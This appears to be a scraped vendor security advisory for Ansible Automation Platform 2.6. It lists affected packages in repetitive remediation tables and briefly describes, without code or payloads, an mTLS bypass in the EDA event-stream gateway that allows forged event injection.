| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in aap-gateway, a component of Ansible Automation Platform's Event-Driven Ansible (EDA). An unauthenticated remote attacker can bypass mutual Transport Layer Security (mTLS) authentication for event streams. This is achieved by manipulating the event stream URL and forging the HTTP Subject header. The system also inadvertently discloses the expected certificate subject in error messages, which simplifies the attack. This vulnerability allows an attacker to inject arbitrary events into EDA, potentially triggering automated workflows.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
